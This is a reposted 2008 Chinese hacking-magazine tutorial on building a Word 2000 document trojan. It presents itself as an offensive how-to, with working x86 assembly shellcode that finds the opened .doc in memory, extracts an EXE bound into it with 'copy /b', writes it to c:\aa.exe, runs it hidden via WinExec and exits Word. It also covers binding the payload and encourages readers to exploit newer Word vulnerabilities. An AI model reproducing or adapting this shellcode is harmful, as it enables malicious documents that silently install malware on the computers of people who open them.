本文主要是介绍编写word木马的shellcode,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
编写Word木马的ShellCode
作者:Azrael 来源:网鹰工作室 日期:2008-01-08 15:24:00
曹军分析了导致去年“万珍”病毒的Word 2000溢出漏洞细节,但并没涉及漏洞的具体利用;第4期文章中,黑防讨论了生成WMF木马的ShellCode的设计与实现。由于自身的特点,Word木马的设计与前者有较大的区别,下面由我对此进行一下分析。
预备知识
讨论ShellCode之前,我们需要掌握几个预备知识:
1.诸如Doc、PDF、WMF、Jpg等文件内容解析过程中引发的漏洞,我们都称之为文件解析漏洞。由于漏洞利用的载体是文件,因此这类漏洞最大的特点就是可以制作成木马。
2.通过文件解析漏洞制作木马的方法有3种:第一种是通过ShellCode来完成全部木马功能,缺陷是往往可能受到ShellCode字节数的限制;第2种是通过ShellCode到指定的URL下载并执行木马文件,缺陷是由于访问网络而可能受到防火墙的限制;第3种是在文件中直接绑定EXE木马文件,这种方式比较隐蔽,ShellCode只负责生成并运行木马文件,复杂的网络通信与系统访问功能都由木马文件来完成。本文中采用第三种方法进行操作。
3.同WMF木马的制作一样,通过copy命令即可在Doc文件中绑定EXE文件: copy /b old.doc+aa.exe new.doc。事实上上,绑定两个文件大多可以通过该命令来完成。
4、与WMF木马基于IE传播不同,Word木马则可能有多种传播形式:E-mail、QQ、IE等。因此,通过在IE临时文件夹(TIF)中查找文件的思路就不可靠了。
ShellCode设计思路
有了上面的预备知识,在假设漏洞已经分析清楚的前提下,ShellCode的设计思路如下:
1.查找ShellCode可用到的各API函数地址,这里没什么技巧。
2.绑定木马后的Doc文件查找,这是关键。前面说了,最好不通过TIF来查找,因为成功率很低。因此最有效的办法就是从内存中进行搜索文件路径,方法如下:
1)找到Doc文件中填写ShellCode的位置,将前两个字节改为EB FE(JMP -2):
EB FE前面4字节0x0013C3F4就是XP SP2下ShellCode地址。
2)用Word打开上述Doc文件,可以看到CPU占有率达到100%。打开 Softice,输入命令code on,发现EIP指针停留在EB FE指令上。
3)Alt+D调出数据区,发现EB FE指令后不远的内存区域内,总包含我们需要的Doc文件路径。因此,我们通过动态搜索内存的方法可以很快找到地址。但必须注意一个问题:要保证从搜索开始地址到Doc文件路径存放地址之间的内存区域一定要连续可读,否则将难以实现。
3.测试时发现内存中Doc文件路径是以UNICODE形式表现的,所以必须通过CreateFileW函数打开该Doc文件,然后通过CreateFileA创建文件aa.exe。
4.通过SetFilePointer函数,让Doc文件的指针指向aa.exe文件数据开始的地方,即指向“MZ”。
5.循环从Doc文件中读取aa.exe文件数据,并写入aa.exe。
6.执行生成的aa.exe,并安全退出WinWord。
汇编实现及ShellCode的提取
思路整理好后,我们开始编程。此程序在Windows XP SP2 +VC6下汇编实现,并测试通过。
1.查找ShellCode可用到的各API函数地址,包括GetProcAddress、LoadLibraryA、CreateFileW、CreateFileA、SetFilePointer、ReadFile、WriteFile、WinExec、ExitThread等。这些函数全部在Kernel32.dll中,具体实现请参考4期溢出文章中的详细介绍,这里仅给出存放函数地址的内存规划
2.在内存中动态搜索Doc文件路径。根据上面的思路,XP SP2下从0x0013c300开始搜索,2000+SP4下从0x0012c300开始搜索。
小知识:由于Word2000的编译器不是2003.NET的,因此2003下该漏洞利用也应该没问题,各位读者可以测试一下。
搜索部分的汇编代码如下:
//从0x0013c300处开始向高地址处搜索当前doc文件路径,搜索标志为:/
//留出空间以备将来存放长的数据
sub esp, 0x800
mov esi, esp
add esi, 4
mov edi, 0x12c300
mov ebx, 0x005C003A //“:/”UNICODE形式
xor ecx, ecx //初始为0
//循环比较
comp:
inc ecx
cmp ebx, dword ptr[edi + ecx - 1]
jnz comp
3.找到Doc文件路径后,通过CreateFileW函数打开该Doc文件,然后通过CreateFileA创建文件aa.exe。汇编代码如下:
lea ebx, dword ptr[edi + ecx - 3]
push 0
push 0x80 //FILE_ATTRIBUTE_NORMAL
push 3 //OPEN_EXISTING
push 0
push 3 //FILE_SHARE_READ | FILE_SHARE_WRITE
push 0x80000000 //GENERIC_READ
push ebx
call dword ptr[ebp + 28h] //CreateFileW
cmp eax, 0
jle gameover //-1则结束
mov dword ptr[ebp + 30h], eax //保存doc文件句柄
//创建可执行文件c:/aa.exe
mov dword ptr[ebp], 0x615c3a63
mov dword ptr[ebp + 4], 'xe.a'
mov dword ptr[ebp + 8], 'e'
push 0
push 0 //FILE_ATTRIBUTE_NORMAL
push 2 //CREATE_ALWAYS
push 0
push 0
push 0x40000000 //GENERIC_WRITE
push ebp
call dword ptr[ebp + 24h] //CreateFileA
cmp eax, 0
jle gameover
mov dword ptr[ebp + 34h], eax //保存exe文件句柄
4.通过SetFilePointer函数让Doc文件指针指向aa.exe文件数据开始的地方,即指向“MZ”。该位置可以直接从UltraEdit32中读取。汇编代码如下:
//SetFilePointer设置文件偏移(exe文件位置)
push 0
push 0
push 0x6800 //exe文件数据开始处
mov eax, dword ptr[ebp + 30h] //doc文件句柄
push eax
call dword ptr[ebp + 20h] //SetFilePointer
5.循环从Doc文件中读取aa.exe文件数据,并写入aa.exe。汇编代码如下:
mov dword ptr[ebp + 40h], 0 //保存每次实际读取的数据
mov dword ptr[ebp + 44h], 0 //保存每次实际写入的数据
Read_Write_exe:
push 0
lea eax, dword ptr[ebp + 40h]
push eax
push 0x400 //每次预定读取1024字节
push esi //存放每次读取后数据的缓冲区地址
push dword ptr[ebp + 30h] //doc文件句柄
call dword ptr[ebp+1Ch] //ReadFile
push 0
lea eax, dword ptr[ebp + 44h] //每次实际写入的数据字节数地址
push eax
push dword ptr[ebp + 40h]
push esi
push dword ptr[ebp + 34h] //exe文件句柄
call dword ptr[ebp+18h] //WriteFile
cmp dword ptr[ebp + 44h], 0x400 //判断是否读写完毕
jge Read_Write_exe
//关闭doc和exe文件句柄
push dword ptr[ebp+30h]
call dword ptr[ebp + 38h] //CloseHandle
push dword ptr[ebp+34h]
call dword ptr[ebp + 38h] //CloseHandle
6、最后执行生成的aa.exe,并安全退出WinWord。汇编代码如下:
push 0 //SW_HIDE
push ebp
call dword ptr[ebp + 14h] //Winexec
gameover:
//ExitThread
push 0
call dword ptr[ebp + 3Ch] //ExitThread
OK,汇编实现就是这样了,接下来就是ShellCode的提取。提取方法以前黑防也介绍过,就是从VC调试界面的内存窗口中直接读取汇编代码对应的机器编码:
然后将这些二进制数据拷贝到UltraEdit32中,再通过一个简单的转换程序转换为我们熟悉的/x形式即可。具体过程这里就不再讨论了,在光盘中我直接给出转换程序代码。
Word木马的构造与测试
ShellCode提取之后,我们再通过两个简单的转换程序写入到Doc文档中。为了不破坏Doc文档,数据写入的方式应该采用“改写”而不是“插入”。两个转换程序分别为 readdoc和newdoc:前者读取Doc文件数据,后者根据前者得到的数据进行改写,并重新生成Doc文件。程序光盘附带,大家直接编译就可以了。
Word木马的构造前面已经提到,直接通过copy命令即可完成。至于测试……大家可以直接绑定cmd.exe试试,在光盘中我也提供了一个绑定后的样本。实际应用中,为了减小Doc木马体积,建议大家采用汇编编写的EXE程序。
从上面的分析可知,绑定一个文件和绑定多个文件的方法类似,并且和绑定的文件格式无关。
小结
在本文中,我们讨论了以Word2000溢出漏洞为基础,创建Word木马的ShellCode编写技术。其实这种方法应用是比较广的,而涉及的技术也大多是比较基础的。最近Word XP和Word 2003又暴出新漏洞,而且已经被成功利用。大家参考2期中的漏洞分析文章和本文,相信也能分析出这些新漏洞。最后还是那句老话,欢迎大家交流。
这篇关于编写word木马的shellcode的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!